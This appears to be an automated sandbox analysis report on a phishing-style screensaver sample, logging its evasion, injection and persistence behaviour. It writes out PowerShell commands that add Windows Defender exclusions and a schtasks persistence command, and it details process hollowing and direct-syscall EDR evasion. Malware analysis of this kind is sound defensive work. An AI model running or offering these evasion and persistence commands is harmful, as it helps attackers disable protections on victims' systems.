                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrMemory allocated: 1B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrMemory allocated: 28B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrMemory allocated: 410000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrMemory allocated: 7DB0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrMemory allocated: 58E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrMemory allocated: 8DB0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrMemory allocated: 5BD0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrMemory allocated: 9ED0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrMemory allocated: AED0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrMemory allocated: BED0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeMemory allocated: 1C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeMemory allocated: 2630000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeMemory allocated: 4E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeMemory allocated: 5B60000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeMemory allocated: 58D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeMemory allocated: 6B60000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeMemory allocated: 7B60000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeMemory allocated: 7EF0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeMemory allocated: 8EF0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeMemory allocated: 9EF0000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_009B0101 rdtsc 8_2_009B0101
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2046Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2096Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3073Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1824Jump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeWindow / User API: threadDelayed 2882Jump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeWindow / User API: threadDelayed 7078Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1434
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1598
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1101
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1217
                Source: C:\Windows\SysWOW64\msinfo32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sqlite3.dllJump to dropped file
                Source: C:\Windows\SysWOW64\msinfo32.exeAPI coverage: 1.9 %
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scr TID: 3532Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scr TID: 3248Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3424Thread sleep count: 2046 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3428Thread sleep count: 2096 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3568Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3588Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3388Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3576Thread sleep time: -120000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3592Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3472Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\taskeng.exe TID: 3652Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exe TID: 3952Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exe TID: 3688Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exe TID: 4000Thread sleep count: 2882 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exe TID: 4000Thread sleep time: -5764000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exe TID: 3044Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exe TID: 4000Thread sleep count: 7078 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exe TID: 4000Thread sleep time: -14156000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3956Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3980Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3804Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4016Thread sleep time: -120000s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4024Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3968Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe TID: 4080Thread sleep time: -70000s >= -30000s
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe TID: 4080Thread sleep count: 31 > 30
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe TID: 4080Thread sleep time: -46500s >= -30000s
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe TID: 4080Thread sleep count: 36 > 30
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe TID: 4080Thread sleep time: -36000s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\msinfo32.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\msinfo32.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\msinfo32.exeFile Volume queried: C:\Users\user\AppData\Local FullSizeInformationJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformationJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 12_2_61E19146 sqlite3_os_init,GetSystemInfo,sqlite3_vfs_register,sqlite3_vfs_register,sqlite3_vfs_register,sqlite3_vfs_register,12_2_61E19146
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPort
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_009B0101 rdtsc 8_2_009B0101
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_009607AC NtCreateMutant,LdrInitializeThunk,8_2_009607AC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00950080 mov ecx, dword ptr fs:[00000030h]8_2_00950080
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_009500EA mov eax, dword ptr fs:[00000030h]8_2_009500EA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_009726F8 mov eax, dword ptr fs:[00000030h]8_2_009726F8
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_P.O.1212024.scr"
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PEJmengI.exe"
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PEJmengI.exe"
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PEJmengI.exe"
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_P.O.1212024.scr"Jump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PEJmengI.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PEJmengI.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PEJmengI.exe"Jump to behavior
                Allocates memory in foreign processes
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeNtQueryInformationProcess: Direct from: 0x774CFAFA
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeNtCreateUserProcess: Direct from: 0x774D093EJump to behavior
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeNtCreateKey: Direct from: 0x774CFB62
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeNtQuerySystemInformation: Direct from: 0x774D20DE
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeNtQueryDirectoryFile: Direct from: 0x774CFDBAJump to behavior
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeNtClose: Direct from: 0x774CFA02
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeNtWriteVirtualMemory: Direct from: 0x774D213EJump to behavior
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeNtCreateFile: Direct from: 0x774D00D6
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeNtSetTimer: Direct from: 0x774D021A
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeNtOpenFile: Direct from: 0x774CFD86
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeNtSetInformationThread: Direct from: 0x774E9893
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeNtOpenKeyEx: Direct from: 0x774CFA4A
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeNtAllocateVirtualMemory: Direct from: 0x774CFAE2
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeNtResumeThread: Direct from: 0x774D008D
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeNtOpenKeyEx: Direct from: 0x774D103A
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeNtUnmapViewOfSection: Direct from: 0x774CFCA2Jump to behavior
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeNtDelayExecution: Direct from: 0x774CFDA1
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeNtSetInformationProcess: Direct from: 0x774CFB4A
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeNtSetInformationThread: Direct from: 0x774CF9CE
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeNtReadFile: Direct from: 0x774CF915
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeNtMapViewOfSection: Direct from: 0x774CFC72
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeNtCreateThreadEx: Direct from: 0x774D08C6
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeNtDeviceIoControlFile: Direct from: 0x774CF931
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeNtRequestWaitReplyPort: Direct from: 0x753C6BCE
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeNtQueryValueKey: Direct from: 0x774CFACA
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeNtOpenSection: Direct from: 0x774CFDEA
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeNtTerminateThread: Direct from: 0x774D00A6
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeNtProtectVirtualMemory: Direct from: 0x774D005A
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeNtWriteVirtualMemory: Direct from: 0x774CFE36Jump to behavior
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeNtRequestWaitReplyPort: Direct from: 0x756F8D92Jump to behavior
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeNtQueryVolumeInformationFile: Direct from: 0x774CFFAE
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeNtNotifyChangeKey: Direct from: 0x774D0F92
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeNtQueryAttributesFile: Direct from: 0x774CFE7E
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeNtReadVirtualMemory: Direct from: 0x774CFEB2Jump to behavior
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeNtSetTimer: Direct from: 0x774E98D5
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeNtSetInformationFile: Direct from: 0x774CFC5AJump to behavior
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeNtQuerySystemInformation: Direct from: 0x774CFDD2
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe protection: execute and read and writeJump to behavior
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeSection loaded: NULL target: C:\Windows\SysWOW64\msinfo32.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: NULL target: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: NULL target: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\msinfo32.exeThread APC queued: target process: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008Jump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008Jump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_P.O.1212024.scr"Jump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PEJmengI.exe"Jump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PEJmengI" /XML "C:\Users\user\AppData\Local\Temp\tmp61C0.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\PEJmengI.exe C:\Users\user\AppData\Roaming\PEJmengI.exeJump to behavior
